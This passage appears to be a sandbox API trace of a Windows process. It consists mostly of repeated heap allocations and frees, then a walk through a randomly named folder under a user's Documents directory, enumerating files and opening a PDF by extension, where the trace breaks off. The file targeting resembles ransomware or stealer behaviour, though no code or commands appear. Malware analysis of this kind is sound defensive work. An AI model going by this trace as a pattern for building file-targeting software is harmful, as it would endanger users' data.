hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0195.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.279] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\") returned="yEpRZCn46rxjDOAUpD\\" [0195.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0195.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0195.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.280] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\") returned="UHfBjIaC\\" [0195.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0195.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0195.280] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\") returned="AzlD\\" [0195.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d425c8 [0195.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0195.280] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0195.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d425c8 | out: hHeap=0x6a0000) returned 1 [0195.280] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0195.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0195.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.281] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0195.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.281] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0195.281] PathFindFileNameW (pszPath="") returned="" [0195.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.281] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\yeprzcn46rxjdoaupd\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e1c3500, ftCreationTime.dwHighDateTime=0x1d89d99, ftLastAccessTime.dwLowDateTime=0x8dc8a650, ftLastAccessTime.dwHighDateTime=0x1d8a727, ftLastWriteTime.dwLowDateTime=0x8dc8a650, ftLastWriteTime.dwHighDateTime=0x1d8a727, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa90 [0195.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.284] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e1c3500, ftCreationTime.dwHighDateTime=0x1d89d99, ftLastAccessTime.dwLowDateTime=0x8dc8a650, ftLastAccessTime.dwHighDateTime=0x1d8a727, ftLastWriteTime.dwLowDateTime=0x8dc8a650, ftLastWriteTime.dwHighDateTime=0x1d8a727, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.284] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd20b5160, ftCreationTime.dwHighDateTime=0x1d89cf4, ftLastAccessTime.dwLowDateTime=0x8848cdc0, ftLastAccessTime.dwHighDateTime=0x1d89fd6, ftLastWriteTime.dwLowDateTime=0x8848cdc0, ftLastWriteTime.dwHighDateTime=0x1d89fd6, nFileSizeHigh=0x0, nFileSizeLow=0x1701c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7 BOWSPyroI2Cx.pdf", cAlternateFileName="7BOWSP~1.PDF")) returned 1 [0195.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0195.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.285] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\7 BOWSPyroI2Cx.pdf") returned=".pdf" [0195.285] CreateFileW 